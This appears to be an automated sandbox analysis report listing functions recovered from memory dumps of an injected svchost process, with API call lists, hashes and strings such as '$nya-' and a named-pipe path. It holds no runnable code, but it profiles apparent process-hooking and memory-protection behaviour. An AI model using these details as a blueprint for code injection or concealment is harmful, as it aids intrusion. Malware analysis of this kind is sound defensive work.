Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 6da2365d5e17544b82aac065803e710dae94bd682bc38aef71eae997fec83743
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4681E528E05640B6FAD8BFE5D6B93AB62B1AB85780F5488349B4857397DBFCCC45C310

Function 0000022F4B8F7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022F4B8F7078
__scrt_acquire_startup_lock.LIBCMT ref: 0000022F4B8F70CA
_RTC_Initialize.LIBCMT ref: 0000022F4B8F70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022F4B8F711E
__scrt_release_startup_lock.LIBCMT ref: 0000022F4B8F7149

Memory Dump Source

Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: bd218116f59a5c56efc38000c5aded2ca847f2db8270a2ecf24cb78a0c5da713
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: CC81A23CE00241B6FAD4BFE9DA59B5B32B1AB86782F5440359B0947397FAB8C957C700

Function 0000022F4B929AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B31
GetLastError.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B3F
LoadLibraryExW.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929B69
FreeLibrary.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BD7
GetProcAddress.KERNEL32(?,?,?,0000022F4B929C6B,?,?,?,0000022F4B92945C,?,?,?,?,0000022F4B928F65), ref: 0000022F4B929BE3

Strings

api-ms-, xrefs: 0000022F4B929B51

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: ec79bae74621d3473f9289de3cbe0439ae45c8112a6144b4fb78fd3ca3ac7a4a
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: C3310A2DE12640A1FE99BFA6E6287A723B4BB59B60F590938DE1D47792DF7CC044C300

Function 0000022F4B933400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000022F4B933431
GetLastError.KERNEL32 ref: 0000022F4B93343D
CloseHandle.KERNEL32 ref: 0000022F4B933455
CreateFileW.KERNEL32 ref: 0000022F4B933480
WriteConsoleW.KERNEL32 ref: 0000022F4B93349F

Strings

CONOUT$, xrefs: 0000022F4B933461

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: d7620b8c19884500c47e3124fb66e9135124c8218baa58d1833e4fac0ed32348
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: F1118129A14A4092E7D0AF92EA6C71A67B0F38CBE4F405234EB5D87B96CFB9C404C740

Function 0000022F4B926270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022F4B9262AB
GetThreadContext.KERNEL32 ref: 0000022F4B926415

Part of subcall function 0000022F4B9260A0: GetCurrentThreadId.KERNEL32 ref: 0000022F4B9260A4

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 54a9b70a4ef810b0383967a9bfaf94ee71e1065358e960c329d1809482fffa67
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 1ED18D3AA08B4891EAB49F5AE5A435A77B0F388B84F100535EBCD47B66DF7CC551CB00

Function 0000022F4B922098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000022F4B9220A6
TlsFree.KERNEL32 ref: 0000022F4B92225F
TlsFree.KERNEL32 ref: 0000022F4B92226B
TlsFree.KERNEL32 ref: 0000022F4B922277
TlsFree.KERNEL32 ref: 0000022F4B922283
TlsFree.KERNEL32 ref: 0000022F4B92228F

Part of subcall function 0000022F4B925E50: GetCurrentThreadId.KERNEL32 ref: 0000022F4B925E66

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: e4614e4e50a161e2bb6536ae214093138366ffb694989e2a8f17203713cc93de
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: F451B328E01B55B5FE8DBFA5EA782A637B1BB04745F804C35962C067A7EFB8C564C340

Function 0000022F4B9235C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000022F4B9224D1), ref: 0000022F4B9235EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000022F4B9224D1), ref: 0000022F4B9235FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000022F4B9224D1), ref: 0000022F4B923673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000022F4B9224D1), ref: 0000022F4B9236D9
HeapFree.KERNEL32(?,?,?,?,?,0000022F4B9224D1), ref: 0000022F4B9236E7

Strings

$nya-, xrefs: 0000022F4B92366C

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: f6368292fef801f456ef4d047ad2896ab5c4a3f22002196d8df88fadc90d907f
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: C8319529F05B55A6F698EF96D76932A63B4FB44B84F0848308F4807B56EFB8C461C700

Function 0000022F4B92C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000022F4B92C94F
SetLastError.KERNEL32 ref: 0000022F4B92C96E
FlsSetValue.KERNEL32 ref: 0000022F4B92C997
FlsSetValue.KERNEL32 ref: 0000022F4B92C9A8
FlsSetValue.KERNEL32 ref: 0000022F4B92C9B9

Part of subcall function 0000022F4B92D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000022F4B92674A), ref: 0000022F4B92D2B6
Part of subcall function 0000022F4B92D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000022F4B92674A), ref: 0000022F4B92D2C0

SetLastError.KERNEL32 ref: 0000022F4B92C9DC

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 5caee82ebc5799ff4bab53cc8ea9f8870476772665104bd938d6c37ff24bf77e
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 88112E2DE1524072F6DC7FB1E63E36B22719F89790F545A34AA66563D7CEACC441C300

Function 0000022F4B921A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000022F4B921A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000022F4B921A74
PathFindFileNameW.SHLWAPI ref: 0000022F4B921A83
lstrlenW.KERNEL32 ref: 0000022F4B921A8F
StrCpyW.SHLWAPI ref: 0000022F4B921AA2
CloseHandle.KERNEL32 ref: 0000022F4B921AB0

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 0a567cbdcd35ce77fb9ef5d2f757b24a0b632dea675aeb3ca454db5b1b0a9327
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: E8015B29B00A4092FA94EF92E9A835A63B1FB8CFC0F4840349F8D43755DEBDC995C780

Function 0000022F4B923E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022F4B923AAC), ref: 0000022F4B923E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923AAC), ref: 0000022F4B923E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923AAC), ref: 0000022F4B923E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923AAC), ref: 0000022F4B923E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923AAC), ref: 0000022F4B923E9F
TerminateThread.KERNEL32(?,?,?,?,?,0000022F4B923AAC), ref: 0000022F4B923EAE

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: c7e426ad3a8663a85c993172cbf675b4bc21cb55f235fc4e2dcdafeb815fee9c
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: A8012D69A1574096FBA8AFA2E9AC71777B1BB4DB45F040434CB4D06366EF7EC458C700

Function 0000022F4B921AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000022F4B921AF4
StrCmpNIW.SHLWAPI ref: 0000022F4B921B0E
lstrlenW.KERNEL32 ref: 0000022F4B921B1D
StrCpyW.SHLWAPI ref: 0000022F4B921B32

Strings

\\?\, xrefs: 0000022F4B921B02

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: c7868ee6e994c88c368ac7911b9c882d734e1b19883b4664ddc12e81d6a56a24
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 7CF0A42AB04685A2F7A0AFA0F6A835A6371F74CB88F845031DB4942559DFADC668C700

Function 0000022F4B923708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,0000022F4B92275A), ref: 0000022F4B92372A
StrCpyW.SHLWAPI ref: 0000022F4B92373A
StrCatW.SHLWAPI ref: 0000022F4B923746
PathCombineW.SHLWAPI(?,?,00000000,0000022F4B92275A), ref: 0000022F4B923754

Strings

\\.\pipe\, xrefs: 0000022F4B923720

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: b8b2264c96036f2fd40b0f46cf7ae1827fe0674ee32b204284edde0178c0ef05
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 43F05458F04B80D2EEC46F92FA2815B5274A74CFC0F445030EF1647B1ACEACC445C700

Function 0000022F4B92B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000022F4B92B929
GetProcAddress.KERNEL32 ref: 0000022F4B92B93F
FreeLibrary.KERNEL32 ref: 0000022F4B92B95B

Strings

CorExitProcess, xrefs: 0000022F4B92B938
mscoree.dll, xrefs: 0000022F4B92B920

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: a04504cd0d85b7767a6ae057d92d07373024f35898ec03b55c9c901403f2537f
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 1FF09629A0470161FA94AF94D9A935B2370EB4D7A4F541639DB6A451E6CFACC448C700

Function 0000022F4B925810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022F4B925896

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8cf9ec95656e8e5e87e39a662f5ad30ac03dab08b7211d00651beb1416509c21
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: E202EA36919B8096EBA4DF55E5A435BB7B0F384794F104435EB8E87B6ADBBCC484CB00

Function 0000022F4B922C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022F4B922CAD
TlsGetValue.KERNEL32 ref: 0000022F4B922CBC
TlsGetValue.KERNEL32 ref: 0000022F4B922CCB
TlsSetValue.KERNEL32 ref: 0000022F4B922E0F
TlsSetValue.KERNEL32 ref: 0000022F4B922E1E
TlsSetValue.KERNEL32 ref: 0000022F4B922E2D

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: e299e2d91b18ef67838866c18cdec6bfca9fe4556afd804b4f662d50e4966460
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 2D51C239E04610A7E7A8EF96E96865B77B0F388B80F104939DF4A43756DBBCC945C700

Function 0000022F4B922AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000022F4B922AE1
TlsGetValue.KERNEL32 ref: 0000022F4B922AF0
TlsGetValue.KERNEL32 ref: 0000022F4B922AFF
TlsSetValue.KERNEL32 ref: 0000022F4B922C3B
TlsSetValue.KERNEL32 ref: 0000022F4B922C4A
TlsSetValue.KERNEL32 ref: 0000022F4B922C59

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: d34dbc50e84e899d59484e42c8476de88141fb153c2056850e267d03047b682d
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 0851A439E14611A7E7A8EFA6E96861B73B0F389B80F104938DF4A43755DFB8C845CB00

Function 0000022F4B925E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022F4B925E66

Memory Dump Source

Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true

Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: d0868c2d9cf30e478813b9fe480cab2c66c994ec008eb639b9f6d8edd7a6fe81
